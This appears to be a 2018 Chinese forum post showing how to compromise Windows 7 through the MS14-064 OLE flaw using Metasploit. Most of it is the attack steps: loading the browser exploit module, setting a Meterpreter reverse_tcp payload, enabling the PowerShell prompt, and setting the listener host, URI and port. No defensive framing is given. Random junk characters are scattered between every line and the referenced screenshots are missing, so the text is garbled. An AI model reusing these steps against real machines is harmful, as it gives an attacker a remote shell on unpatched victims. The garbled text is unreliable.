找回密码
 立即注册
查看: 1757|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

2 g4 _) x. G& S0 d 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示. d6 t" |% p3 ^; M+ [. i* a

) R# ?7 w% g/ W6 U& D' T$ V+ U

: x( g8 v! _! b3 d) W1 E 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: % ~% v8 {$ h, \) Z8 d; D- W4 M/ G

. b6 g- M' \- v) h. \

7 Y( }* i7 m" c9 n8 u. l+ p 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp, z; a. W; c" E/ R* N9 T

2 O5 ?6 r: V9 _& j& y2 j

1 P9 ^0 z- L' g( C5 ~7 _             set AllowPowershellPrompt true 5 {7 J, ?4 W L' f; I, u. h

8 x2 ]' H2 m$ n1 v! k/ }# {7 S, h

3 C; W+ f ~2 t) j6 f Q             Set LHOST 192.168.0.109 ' ~, L! X2 B8 T

% i' S6 z" _: j8 ~ P( n# I7 l

' m2 _& V# O, ?7 O% ?# e             set SRVHOST 192.168.0.109* ^/ d- l3 u( E& e( \& H

4 s9 Q2 Z& j, J- x' U" L6 U2 s2 u

* f; _ U- c' \+ M2 j3 V             Set uripath share9 v7 f, u( v" g

( h' Q1 I8 {% O6 [' Y

8 X, V% O' K" _" n2 o2 l2 ?9 l             Set srvport 80 $ c" f$ \3 F: f u" ]; r

& @/ a t, f0 V! R1 c

, P( L0 K; X2 G' K& c& e* W- C  " K. G( o. c: g. n

5 K, p+ U) A0 M. U2 O9 C

{. \! h8 F# [8 M. T, V   - `* W" _5 R+ z: T+ H+ A

1 {/ a2 |5 ]1 V" D0 z3 W2 l

9 k3 l1 a9 z& f9 |# |   1 g$ L6 q1 l+ X1 h( R% U: D

8 ]0 ^$ D9 s4 r6 i

% F, t) o) @# m; t, C5 _0 m' i5 k5 X  " T' U0 Q5 t; H/ X0 Z6 Q

. Q* P o8 N0 n0 S7 } U

) E9 Z r0 n. I! _" R3 k   , ]; b$ W: w) w# R6 T- ]

* Q( \ ^# X% a9 f- ?! m& c

3 r4 @0 U4 T0 A! J8 |/ ]) q7 ? 下面我们来访问本地地址如图:% c* D4 G# M: w7 N# Q0 r; U

) n. E8 |+ T* i7 V: O9 E) f, t

- y5 w- u7 }; n. C) f; ^1 Z4 y   * x& K$ x' b8 C3 C; x2 M4 j

6 v: f7 n& t% M3 D

. a M1 A' i8 A2 @8 D  " R0 G: N3 ~# V* Z' y

0 j, V8 [! f3 m5 e

8 X4 c8 t/ k, s* j% u1 x) C3 T& R 6 H! m: B0 R1 E) U2 C: z" c# {0 i3 m$ s

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表